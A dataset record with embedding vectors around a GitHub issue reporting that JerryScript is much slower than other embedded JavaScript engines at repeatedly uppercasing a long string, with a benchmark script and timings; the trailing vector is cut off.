-0.02246837131679058, -0.004119201563298702, 0.0032720030285418034, -0.011797748506069183, 0.010878250934183598, -0.008453446440398693, -0.009061501361429691, -0.01005515269935131, 0.003279418218880892, 0.015720445662736893, 0.022067945450544357, 0.013043520040810108, 0.003889326937496662, -0.013154749758541584, 0.020614545792341232, 0.013429115526378155, -0.013599667698144913, -0.006662650965154171, 0.002519349567592144, -0.0036316451150923967, -0.019368775188922882, 0.015423832461237907, -0.015987396240234375, -0.02805951051414013, 0.013985264115035534, -0.004730964079499245, -0.019828522577881813, 0.01527552679181099, -0.02939426526427269, 0.02847476862370968, -0.00922463834285736, -0.000683134887367487, 0.006358623504638672, -0.012583770789206028, 0.009098578244447708, 0.03390277177095413, -0.036987535655498505, 0.01947258971631527, -0.010744775645434856, 0.0031848731450736523, 0.025582799687981606, 0.010551977902650833, -0.007140937726944685, 0.004419521428644657, -0.010158966295421124, -0.009350698441267014, -0.010092228651046753, -0.005780229810625315, -0.0034610931761562824, -0.0028270846232771873, -0.020495900884270668, -0.03241971135139465, 0.0007994624902494252, -0.014215137809515, -0.009639895521104336, 0.0178560521453619, 0.023002274334430695, -0.04582658037543297, 0.013814711943268776, -0.0008054873906075954, -0.017752237617969513, -0.0037336056120693684, -0.004389860201627016, -0.015305187553167343, -0.010522316209971905, 0.018048850819468498, -0.005424295086413622, -0.0006479122093878686, 0.01153821311891079, -0.003590861102566123, -0.0005070214392617345, -0.007941790856420994, -0.011449229903519154, 0.004619734361767769, 0.015030821785330772, -0.01827131025493145, -0.000014656811799795832, 0.010841174982488155, -0.001642489922232926, -0.006410530302673578, 0.0280150193721056, 0.022631509229540825, 0.0340510755777359, -0.0054057566449046135, -0.009143070317804813, -0.020317932590842247, 0.007400473579764366, 0.0029438757337629795, -0.0065402984619140625, 0.007711916230618954, -0.02482643909752369, -0.0028048388194292784, -0.012094360776245594, 0.0051313904114067554, -0.022067945450544357, -0.0003830468049272895, 0.003481485415250063, -0.014430182054638863, 0.0008476619841530919, 0.010470409877598286, 0.02030310221016407, 0.02653195895254612, -0.01520137395709753, -0.003097743261605501, -0.004515920300036669, 0.013725727796554565, -0.0060508884489536285, 0.013881449587643147, -0.013162164948880672, -0.016951385885477066, -0.018909025937318802, -0.010944988578557968, 0.0006163971847854555, -0.0009973584674298763, 0.01294712070375681, 0.012472542002797127, 0.0017092275666072965, -0.0022857675794512033, 0.0004168791347183287, -0.013065765611827374, 0.006158410105854273, -0.010833759792149067, 0.01809334196150303, 0.010233120061457157, -0.0010307272896170616, -0.005353849846869707, -0.0001837605086620897, -0.024396350607275963, -0.012012792751193047, 0.008668490685522556, -0.012161098420619965, -0.01192380953580141, -0.018627244979143143, -0.01892385631799698, 0.006113918498158455, -0.00797886773943901, 0.028133664280176163, 0.002693609334528446, -0.004667934030294418, 0.016817910596728325, 0.006803541444242001, 0.03096630983054638, -0.006503221578896046, -0.0023135750088840723, 0.02436668984591961, 0.010069983080029488, 0.01133058499544859, -0.000022854199414723553, -0.00782314594835043, 0.003911572974175215, -0.01095981989055872, -0.014556242153048515, 0.019546741619706154, 0.0015655560418963432, -0.007229921407997608, 0.0024581733159720898, 0.01319924183189869, 0.0070185852237045765, 0.026591280475258827, -0.009105993434786797, -0.023239564150571823, 0.004682764410972595, 0.003485193010419607, -0.004134031943976879, -0.007726747076958418, -0.03221208229660988, 0.006199194118380547, -0.02292812056839466, 0.00023508831509388983, -0.0006729388842359185, -0.0032553186174482107, -0.018834872171282768, 0.007682255003601313, -0.0009723317343741655, -0.004419521428644657, 0.003937526606023312, -0.004248969256877899, 0.00872039794921875, 0.01601705700159073, 0.03138156607747078, -0.02089632675051689, 0.0028456230647861958, -0.003318348666653037, 0.0035778842866420746, 0.009024425409734249, -0.0037057981826364994, -0.012546694837510586, -0.010210873559117317, 0.003199703758582473, 0.0002357835037400946, -0.00959540344774723, 0.011627197265625, -0.009521250613033772, -0.01363674458116293, 0.009565742686390877, 0.009313622489571571, 0.0037169212009757757, 0.015075313858687878, 0.045885901898145676, 0.007582148537039757, 0.006113918498158455, -0.030061643570661545, 0.008905780501663685, -0.00886128842830658, -0.012709831818938255, 0.007704501040279865, -0.007470918819308281, -0.0030829126480966806, 0.005846967454999685, 0.005884043872356415, -0.025078559294342995, 0.01229457464069128, 0.013458777219057083, -0.019250130280852318, 0.01393335685133934, -0.002461880911141634, 0.0031848731450736523, 0.025449324399232864, 0.012353897094726562, 0.009239468723535538, 0.008601753041148186, 0.003201557556167245, -0.013577422127127647, -0.009054086171090603, -0.0036538911517709494, 0.02191963978111744, -0.02080734446644783, 0.0064253611490130424, -0.0014645225601270795, 0.006777587812393904, -0.03811466321349144, 0.005769106559455395, 0.030669698491692543, -0.03138156607747078, 0.0006710850284434855, -0.014037170447409153, -0.010974650271236897, 0.022942950949072838, 0.003316494869068265, 0.012361312285065651, -0.0007971451850607991, 0.005439125467091799, 0.011056218296289444, -0.008060435764491558, -0.000546878669410944, 0.007897298783063889, -0.006503221578896046, -0.008987348526716232, -0.01460073422640562, 0.0022672293707728386, -0.007667424622923136, -0.02390694059431553, 0.010181212797760963, -0.005843259859830141, 0.01929462142288685, 0.010047737509012222, 0.0012272328604012728, 0.0011058072559535503, -0.00372062879614532, 0.006747926585376263, 0.0015479447320103645, -0.008846458047628403, -0.0008064143476076424, 0.009543496184051037, 0.012190760113298893, 0.008483108133077621, -0.0226166769862175, 0.005780229810625315, 0.017099691554903984, 0.010099644772708416, 0.001777819124981761, -0.011686519719660282, -0.02672475576400757, 0.010759606026113033, 0.01707003079354763, 0.007037123665213585, 0.017084861174225807, 0.005913705099374056, -0.01905733160674572, 0.0014552534557878971, -0.014333782717585564, 0.005713491700589657, 0.007986282929778099, -0.0052759889513254166, 0.004341660533100367, 0.014222552999854088, -0.01296936720609665, 0.017870882526040077, -0.00040181679651141167, -0.019828522577881813, -0.021978961303830147, 0.004056171514093876, -0.004616026766598225, 0.0017212774837389588, -0.010366595350205898, 0.011946055106818676, 0.003316494869068265, 0.002547156997025013, -0.05175882205367088, 0.011946055106818676, -0.01684757135808468, 0.02395143173635006, -0.0005542939761653543, -0.016921723261475563, 0.02191963978111744, 0.017544610425829887, 0.00751911848783493, 0.0013987116981297731, -0.019250130280852318, -0.0415257029235363, -0.0005839552031829953, -0.009951338171958923, 0.013859203085303307, 0.010158966295421124, -0.011174863204360008, 0.011775502935051918, 0.01540900208055973, 0.01693655550479889, 0.007637763395905495, -0.0020670159719884396, -0.023981094360351562, -0.000602493470069021, 0.006573667284101248, -0.017233166843652725, 0.0011845948174595833, -0.019457757472991943, -0.009780786000192165, -0.008371878415346146, -0.0009079112787730992, 0.02209760621190071, 0.006325254682451487, 0.007615517359226942, 0.01293970551341772, -0.02583491988480091, -0.0035797380842268467, 0.014089077711105347, -0.0020670159719884396, -0.0018983178306370974, 0.004712425637990236, -0.00323492637835443, 0.013644159771502018, -0.0070593697018921375, 0.003201557556167245, -0.013651574961841106, 0.004538166336715221, 0.017796730622649193, -0.0016526859253644943, -0.0037076519802212715, -0.018805211409926414, 0.013280809856951237, 0.010900497436523438, -0.016031887382268906, 0.0012948975199833512, 0.02091115713119507, 0.008712982758879662, -0.027940865606069565, -0.007986282929778099, -0.015023406594991684, 0.026695095002651215, -0.026190854609012604, 0.01527552679181099, -0.010626130737364292, 0.0057653989642858505, 0.0012003523297607899, 0.016091210767626762, 0.007741577457636595, 0.00909116305410862, -0.007296659518033266, 0.00039602359174750745, 0.02126709185540676, 0.016550958156585693, 0.01294712070375681, 0.0019205637509003282, -0.000245400209678337, -0.00892802607268095, -0.0015674099558964372, 0.0024544657208025455, 0.01192380953580141, 0.016461975872516632, -0.018805211409926414, -0.013377209194004536, -0.009031840600073338, -0.002498957561329007, 0.01564629189670086, 0.011152617633342743, 0.02048107050359249, 0.0035167080350220203, -0.0035445154644548893, 0.016714096069335938, 0.01661028154194355, -0.012116607278585434, 0.01919080689549446, 0.016951385885477066, 0.006829495076090097, 0.021623026579618454, 0.012109192088246346, 0.0016962508670985699, 0.007934375666081905, -0.0034091861452907324, -0.012235252186655998, 0.030491730198264122, 0.007326320745050907, -0.0012374288635328412, -0.0007776800193823874, -0.013377209194004536, -0.017411135137081146, 0.010136720724403858, -0.016595451161265373, 0.02371414192020893, 0.018894195556640625, 0.015898412093520164, -0.023877279832959175, -0.015898412093520164, 0.011211940087378025, 0.005984150338917971, 0.007815730758011341, -0.03672058507800102, 0.0068888175301253796, -0.012479957193136215, -0.030462069436907768, 0.0058210138231515884, -0.0065847900696098804, -0.0003230291767977178, -0.002497103763744235, -0.008475692942738533, -0.016639942303299904, -0.02384761907160282, 0.003666867967694998, 0.014311537146568298, 0.021534044295549393, -0.0013532929588109255, 0.01798952743411064, 0.017841221764683723, -0.012339065782725811, 0.008216156624257565, 0.002899383893236518, 0.023877279832959175, -0.0001048570338753052, -0.014697132632136345, -0.008564676158130169, 0.022676000371575356, -0.003483339212834835, 0.0012170368572697043, 0.005554062779992819, -0.03262733668088913, 0.01220559049397707, 0.007748992647975683, -0.0018473376985639334, -0.01467488706111908, -0.0012911898083984852, -0.008112343028187752, 0.005928535480052233, 0.012695000506937504, -0.009335868060588837, 0.009328452870249748, 0.0058951666578650475, -0.002441488904878497, 0.005554062779992819, -0.015601799823343754, 0.025597630068659782, 0.002578672021627426, 0.01960606500506401, -0.007066784892231226, 0.00023300276370719075, -0.015008575282990932, 0.010314688086509705, -0.0028938225004822016, 0.009995830245316029, -0.010581638664007187, 0.023106086999177933, -0.011189693585038185, 0.0022097607143223286, 0.0001524771942058578, 0.017796730622649193, -0.022112436592578888, -0.019398435950279236, 0.010878250934183598, -0.01019604317843914, -0.004349075723439455, 0.018612412735819817, 0.004078417085111141, -0.020881496369838715, -0.02279464527964592, -0.006117626093327999, -0.009914261288940907, -0.000014794401067774743, -0.011456645093858242, 0.0014024194097146392, 0.0205700546503067, 0.034762945026159286, 0.00901701021939516, -0.006558836437761784, -0.018879365175962448, -0.0018769989255815744, -0.0006062011234462261, 0.000931084156036377, -0.014482089318335056, -0.00021342172112781554, 0.0034722161944955587, 0.013718312606215477, -0.00009576170123182237, -0.010893082246184349, -0.013555175624787807, 0.010507485829293728, -0.0007874126313254237, -0.018701396882534027, 0.019665386527776718, 0.001474718563258648, -0.010811513289809227, -0.020599715411663055, -0.0121388528496027, 0.001782453735359013, -0.012984197586774826, -0.011211940087378025, 0.0074635036289691925, 0.013206657022237778, -0.0071446457877755165, 0.016758587211370468, 0.009847523644566536, 0.015216204337775707, 0.01637299172580242, -0.01156045962125063, 0.004905223846435547, -0.006662650965154171, -0.00007959865615703166, 0.006677481345832348, 0.011338000185787678, 0.031945131719112396, -0.0010196042712777853, 0.004085832741111517, 0.016966216266155243, 0.010982065461575985, 0.00461231917142868, -0.0015683368546888232, 0.011857070960104465, -0.026131531223654747, -0.0005084117874503136, -0.009128239005804062, 0.018627244979143143, -0.0012698707869276404, -0.0055763088166713715, -0.008661075495183468, -0.011352830566465855, 0.017292490229010582, 0.019250130280852318, 0.00828289519995451, -0.017010707408189774, -0.022023454308509827, -0.008712982758879662, -0.0027195627335458994, -0.02080734446644783, 0.003290541237220168, -0.006569959688931704, 0.02458914928138256, -0.0003033322864212096, -0.011085879988968372, 0.0013115819310769439, -0.00290679931640625, -0.0036650141701102257, -0.0035500768572092056, 0.023091256618499756, 0.011664273217320442, -0.013021274469792843, -0.008238403126597404, -0.0020336471498012543, -0.02408490888774395, -0.004979376681149006, 0.010025491006672382, 0.0018807065207511187, -0.005453956313431263, -0.005068360362201929, -0.011612365953624249, -0.01855309121310711, 0.011842240579426289, -0.013228902593255043, 0.00640311511233449, -0.003844835329800844, -0.011226770468056202, -0.003375817323103547, -0.008379293605685234, -0.023521345108747482, -0.0014478381490334868, 0.007055662106722593, 0.01569078303873539, -0.03603838011622429, -0.006762757431715727, -0.003153358120471239, -0.006458729971200228, -0.006521760020405054, -0.013458777219057083, -0.008001113310456276, -0.015661122277379036, -0.0005705149378627539, -0.0011345415841788054, 0.0009741855901665986, 0.018523430451750755, -0.011486305855214596, 0.01058905478566885, -0.018523430451750755, 0.0015544331399723887, 0.0005149001954123378, -0.003677990986034274, 0.0035185618326067924, -0.005587431602180004, 0.014956668950617313, -0.001998424530029297, -0.00832738634198904, 0.013503269292414188, 0.014964084140956402, -0.008090096525847912, -0.022349726408720016, -0.006510637234896421, 0.015438663773238659, 0.01102655753493309, -0.011508552357554436, -0.005142513662576675, -0.007704501040279865, -0.013970432803034782, 0.000024244569431175478, 0.0004847755189985037, 0.003750290023162961, -0.0035482230596244335, 0.0047272564843297005, -0.004378736950457096, 0.011471475474536419, -0.006844325922429562, 0.005728322546929121, 0.01003290619701147, -0.002217175904661417, -0.003863373538479209, -0.01012930553406477, 0.007926960475742817, -0.001509014400653541, -0.003251610789448023, -0.025449324399232864, -0.005242620129138231, -0.03316124156117439, -0.0031978499609977007, 0.010715114884078503, 0.00895027257502079, -0.026695095002651215, 0.0047569177113473415, -0.006644112523645163, -0.016921723261475563, 0.010848590172827244, -0.008579506538808346, 0.01809334196150303, 0.004679056815803051, -0.01460073422640562, 0.019784031435847282, 0.00230615958571434, 0.004085832741111517, 0.032508693635463715, -0.008512768894433975, 0.003399916924536228, -0.0037966356612741947, -0.02224591188132763, 0.007226213812828064, -0.008364463225007057, -0.018953517079353333, 0.007515410892665386, -0.03230106458067894, -0.012650509364902973, 0.008319971151649952, 0.004130324348807335, 0.004771748092025518, 0.00685174111276865, -0.0026899015065282583, 0.006595912855118513, -0.021489551290869713, 0.006047180388122797, 0.008416370488703251, 0.0030291518196463585, -0.012457710690796375, 0.01960606500506401, 0.010826343670487404, -0.010870835743844509, -0.021014971658587456, 0.05080966278910637, -0.002606479451060295, -0.007771238684654236, 0.00431570690125227, 0.007315197493880987, 0.01451175007969141, -0.004816240165382624, -0.012554110027849674, -0.011478890664875507, -0.0009134727879427373, 0.0014218846336007118, -0.002899383893236518, 0.0050312839448452, -0.021904809400439262, -0.003210826776921749, 0.004111786372959614, 0.0005014599300920963, 0.006325254682451487, -0.006803541444242001, -0.004530750680714846, -0.01490476168692112, -0.013792465440928936, 0.029231129214167595, -0.011612365953624249, -0.0005867359577678144, 0.008134588599205017, 0.0035686150658875704, -0.005550355184823275, 0.019739540293812752, -0.023269224911928177, 0.03081800416111946, -0.018063681200146675, -0.018152665346860886, -0.004582657944411039, 0.013592252507805824, 0.0099661685526371, 0.004686472471803427, 0.021074295043945312, -0.032686661928892136, -0.03090698830783367, 0.02168234996497631, 0.006532882805913687, -0.013443946838378906, 0.01929462142288685, 0.009543496184051037, -0.005346434190869331, 0.0038744963239878416, -0.001176252611912787, 0.008127173408865929, 0.00039023038698360324, 0.008156834170222282, 0.009113408625125885, -0.008223572745919228, 0.008735228329896927, 0.014318952336907387, -0.013807296752929688, -0.0056801228784024715, -0.021326415240764618, -0.01176808774471283, -0.018834872171282768, -0.008015943691134453, -0.013206657022237778, -0.025686614215373993, 0.00019523105584084988, -0.011338000185787678, 0.002519349567592144, 0.013184410519897938, 0.01033693365752697, -0.01707003079354763, 0.02504889667034149, -0.0025026651564985514, -0.005646754056215286, 0.012620847672224045, 0.0059248278848826885, -0.024010755121707916, -0.014689717441797256, 0.004460305441170931, 0.005728322546929121, -0.0031348199117928743, 0.0033609867095947266, -0.007919545285403728, -0.0007753627724014223, -0.01988784596323967, -0.01947258971631527, -0.01844927668571472, -0.009832693263888359, -0.013896279968321323, 0.007615517359226942, -0.027303149923682213, 0.033250223845243454, 0.01280623022466898, 0.01942809671163559, -0.026784079149365425, 0.0026676557026803493, -0.009558327496051788, 0.0005802475498057902, -0.00046090749674476683, 0.00636603869497776, -0.0028029850218445063, 0.004864439368247986, 0.0053612650372087955, 0.021074295043945312, -0.03265700116753578, -0.010551977902650833, 0.011879317462444305, -0.02048107050359249, 0.006417945958673954, -0.0028660150710493326, -0.029779860749840736, 0.0060212272219359875, 0.01637299172580242, -0.0007197479717433453, -0.019917506724596024, 0.011426983401179314, 0.01711452193558216, -0.007089030928909779, 0.014029755257070065, 0.016550958156585693, 0.013028689660131931, -0.01167168840765953, 0.004400982987135649, -0.009647310711443424, 0.029750199988484383, 0.025256525725126266, 0.0012290866579860449, -0.010737360455095768, 0.013325301930308342, 0.01573527604341507, -0.0012782131088897586, -0.0028104002121835947, 0.019086992368102074, -0.02279464527964592, 0.016120871528983116, 0.0030699358321726322, -0.001922417664900422, 0.015438663773238659, -0.005038699135184288, 0.01975437067449093, 0.011412153020501137, -0.03236038610339165, -0.004875562619417906, 0.03971637040376663, -0.01661028154194355, 0.005164759233593941, -0.00031352831865660846, 0.015334849245846272, -0.014222552999854088, 0.005461371503770351, 0.0016906893579289317, -0.021800994873046875, 0.018523430451750755, 0.00012640775821637362, 0.01213143765926361, -0.00952866580337286, -0.01160495076328516, 0.005390926264226437, 0.004938592668622732, 0.019042501226067543, -0.018998010084033012, -0.0018417761893942952, -0.01960606500506401, 0.004415813833475113, -0.004145155195146799, 0.02316541038453579, 0.008364463225007057, 0.013050935231149197, -0.0008407101267948747, -0.013258564285933971, 0.008772305212914944, -0.0013866618974134326, 0.004857024177908897, -0.008905780501663685, 0.017841221764683723, -0.009046670980751514, 0.0045270430855453014, 0.00004437595998751931, -0.003483339212834835, -0.00431570690125227, 0.037165503948926926, -0.00017565001326147467, 0.014363444410264492, 0.016298837959766388, -0.015245865099132061, 0.00257311062887311, 0.038648564368486404, -0.0005436344654299319, -0.008164250291883945, 0.001317143440246582, 0.0005895166541449726, 0.022231081500649452, -0.017826391384005547, -0.023654820397496223, 0.013584837317466736, -0.0010761460289359093, -0.01437085960060358, 0.022112436592578888, 0.0033239100594073534, 0.010084813460707664, 0.026265008375048637, -0.01005515269935131, 0.0008393197203986347, -0.02745145559310913, -0.013362377882003784, 0.004586365539580584 ]
209
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
#### Description When a long string is repeatedly converted to uppercase, the execution time of the Jerryscript much longer than other engines. For example, [XS](https://github.com/Moddable-OpenSource/moddable) , similar to jerryscript, a JavaScript engine that runs on resource-constrained devices. Does this problem need to be optimized? #### Version bd1c4df #### Testcase ```javascript var NISLFuzzingFunc = function (x) { x.toUpperCase(); }; var NISLParameter0 = 'PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP'; for (var INDEX = 0; INDEX < 10000; INDEX++) { NISLFuzzingFunc(NISLParameter0); } ``` #### Command ``` bash build/bin/jerry testcase.js ``` #### Execution time JerryScript: 5834ms [XS](https://github.com/Moddable-OpenSource/moddable):81ms [duktape](https://github.com/svaarala/duktape): 103ms [quickJS](https://bellard.org/quickjs/): 94ms MuJS: 320ms hermes: 47ms ### Build command ``` bash python2 tools/build.py --clean --logging=on --line-info=on --error-messages=on --cpointer-32bit=on --mem-heap=1572864 --profile=es2015-subset ``` #### CPU ``` Intel(R) Core(TM) i9-9940X CPU @ 3.30GHz ```
A possible performance problem about String.prototype.toUpperCase
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4617/comments
3
2021-03-04T06:55:16
2021-03-12T14:58:42Z
https://github.com/jerryscript-project/jerryscript/issues/4617
821,822,148
4,617
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : A possible performance problem about String.prototype.toUpperCase Issue date: --- start body --- #### Description When a long string is repeatedly converted to uppercase, the execution time of the Jerryscript much longer than other engines. For example, [XS](https://github.com/Moddable-OpenSource/moddable) , similar to jerryscript, a JavaScript engine that runs on resource-constrained devices. Does this problem need to be optimized? #### Version bd1c4df #### Testcase ```javascript var NISLFuzzingFunc = function (x) { x.toUpperCase(); }; var NISLParameter0 = 'PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP'; for (var INDEX = 0; INDEX < 10000; INDEX++) { NISLFuzzingFunc(NISLParameter0); } ``` #### Command ``` bash build/bin/jerry testcase.js ``` #### Execution time JerryScript: 5834ms [XS](https://github.com/Moddable-OpenSource/moddable):81ms [duktape](https://github.com/svaarala/duktape): 103ms [quickJS](https://bellard.org/quickjs/): 94ms MuJS: 320ms hermes: 47ms ### Build command ``` bash python2 tools/build.py --clean --logging=on --line-info=on --error-messages=on --cpointer-32bit=on --mem-heap=1572864 --profile=es2015-subset ``` #### CPU ``` Intel(R) Core(TM) i9-9940X CPU @ 3.30GHz ``` --- end body ---
2,318
[ -0.007720018271356821, -0.002695910632610321, -0.009949895553290844, 0.02144143544137478, 0.02131558768451214, 0.020591959357261658, -0.004998544696718454, 0.04448743909597397, -0.036307286471128464, -0.009910568594932556, 0.012537655420601368, 0.02468203380703926, 0.024855075404047966, 0.011869085021317005, 0.01601422019302845, 0.039359115064144135, -0.022275181487202644, -0.01705246977508068, -0.02461910992860794, 0.013072511181235313, -0.03416786342859268, 0.018767155706882477, -0.037251152098178864, 0.0226055346429348, -0.01859411410987377, 0.019459322094917297, 0.006618843879550695, 0.016155799850821495, 0.01199493370950222, -0.005108661949634552, 0.015809716656804085, 0.009540888480842113, -0.02364378422498703, 0.016281647607684135, 0.012348882853984833, -0.0035139257088303566, 0.03734553977847099, 0.022306643426418304, -0.04162438586354256, -0.031698089092969894, -0.009745392017066479, -0.02543712593615055, -0.038635484874248505, 0.054807014763355255, 0.031477853655815125, 0.06245231255888939, 0.014047836884856224, 0.018641307950019836, 0.01230955496430397, 0.01796487160027027, -0.009210536256432533, -0.019695287570357323, 0.0014600390568375587, -0.04851458966732025, 0.0022869028616696596, -0.03357008472084999, 0.027246197685599327, -0.0037951183039695024, 0.0445818267762661, 0.0233920868486166, 0.0156995989382267, -0.057638607919216156, -0.010728583671152592, 0.01103533897548914, 0.022652728483080864, 0.05162934213876724, -0.010791507549583912, 0.0026251208037137985, 0.039138879626989365, 0.02380109578371048, -0.04156146198511124, 0.03020363673567772, 0.055216021835803986, 0.03432517498731613, 0.0031088509131222963, -0.040491752326488495, 0.039107415825128555, 0.00521877920255065, -0.021992022171616554, 0.020466109737753868, 0.015676002949476242, 0.01714685559272766, -0.017382822930812836, 0.010115072131156921, 0.019742481410503387, -0.0022102140355855227, -0.039233267307281494, -0.0445818267762661, -0.009690333157777786, -0.010901625268161297, -0.02417864091694355, 0.018798617646098137, -0.03357008472084999, -0.0020745336078107357, -0.024823613464832306, 0.039736658334732056, -0.070978544652462, 0.0024737094063311815, -0.019632363691926003, -0.006009265314787626, 0.017728906124830246, 0.0006587381940335035, 0.016564806923270226, -0.0227628443390131, 0.027875440195202827, 0.017288435250520706, 0.0226055346429348, -0.002115827752277255, 0.007955984212458134, 0.09533023089170456, 0.03596120327711105, -0.028300179168581963, -0.026396719738841057, -0.01573106087744236, -0.02320331521332264, -0.0018729794537648559, 0.010115072131156921, -0.03762869909405708, 0.0030183973722159863, 0.041089531034231186, -0.02502811700105667, 0.004856965038925409, -0.031477853655815125, -0.007590236607939005, -0.04801119863986969, 0.031005920842289925, -0.004695721436291933, 0.01676931045949459, 0.0215043593198061, -0.02181898057460785, -0.04263117536902428, 0.02587759494781494, 0.015487229451537132, -0.007645295467227697, 0.04492790997028351, 0.005619921255856752, 0.003285825252532959, 0.02421010285615921, -0.018515458330512047, -0.013402863405644894, -0.016281647607684135, 0.00015546711802016944, 0.020230144262313843, 0.0066581713035702705, 0.010555542074143887, -0.022023485973477364, -0.027387777343392372, 0.05282490327954292, -0.0000540755208930932, -0.016313109546899796, 0.019506515935063362, -0.03379032015800476, -0.010602734982967377, 0.008699276484549046, 0.011444346979260445, 0.009611678309738636, -0.01094095315784216, 0.023753901943564415, -0.00153279525693506, 0.028882227838039398, -0.038918644189834595, -0.027529357001185417, -0.0036653371062129736, -0.027293389663100243, -0.03457687050104141, 0.007920589298009872, -0.02351793646812439, 0.04414135590195656, 0.010815104469656944, 0.012144379317760468, -0.012136513367295265, 0.0054901400581002235, 0.001338123343884945, 0.009792584925889969, -0.014087164774537086, 0.005871618632227182, 0.013457922264933586, -0.016690654680132866, -0.002902380656450987, -0.04609200730919838, -0.022180795669555664, -0.02932269684970379, -0.01234101690351963, 0.000299381761578843, 0.02219652757048607, -0.028929421678185463, -0.001348938443697989, 0.04140415042638779, -0.002878784202039242, -0.0232347771525383, -0.008034639060497284, -0.004050747957080603, 0.010303844697773457, -0.019270548596978188, 0.009651006199419498, 0.0358038954436779, -0.013229821808636189, -0.02430448867380619, 0.007590236607939005, 0.02251114882528782, 0.0332869254052639, -0.017319897189736366, -0.054838478565216064, -0.04388966038823128, 0.015738926827907562, -0.029338428750634193, 0.004035016987472773, 0.002977103227749467, 0.018232299014925957, -0.0013194427592679858, -0.00783406849950552, -0.002115827752277255, 0.018609844148159027, -0.00849477294832468, -0.00563565269112587, -0.001548526342958212, -0.00019516347674652934, -0.0009866324253380299, -0.042442403733730316, -0.007067178841680288, 0.0047507802955806255, 0.008062168955802917, -0.022086409851908684, -0.0055334004573524, -0.040460288524627686, -0.038037706166505814, -0.017697444185614586, 0.026805726811289787, 0.004927754867821932, 0.017414284870028496, 0.037911854684352875, -0.018672769889235497, -0.021268393844366074, 0.02103242836892605, 0.040051281452178955, -0.0025366335175931454, 0.010917356237769127, 0.01730416715145111, -0.010838700458407402, 0.04212778061628342, 0.0037459589075297117, 0.009548753499984741, 0.004506948869675398, -0.0458403117954731, 0.038761332631111145, -0.02395840547978878, 0.002397020347416401, -0.03064410574734211, -0.02235383726656437, 0.028536144644021988, -0.04253678768873215, -0.0232347771525383, 0.018389610573649406, -0.007995312102138996, 0.011224111542105675, -0.018955927342176437, -0.016942352056503296, 0.02534273825585842, -0.04684709757566452, -0.012757889926433563, 0.022904423996806145, 0.04357503727078438, -0.029904747381806374, 0.0417502336204052, -0.0036122447345405817, 0.005391821265220642, -0.024320220574736595, 0.010012820363044739, -0.05096863582730293, -0.011224111542105675, 0.023281969130039215, -0.03369593247771263, -0.013041049242019653, 0.03514318913221359, 0.00818015169352293, 0.004031084477901459, -0.03655898571014404, 0.021362779662013054, 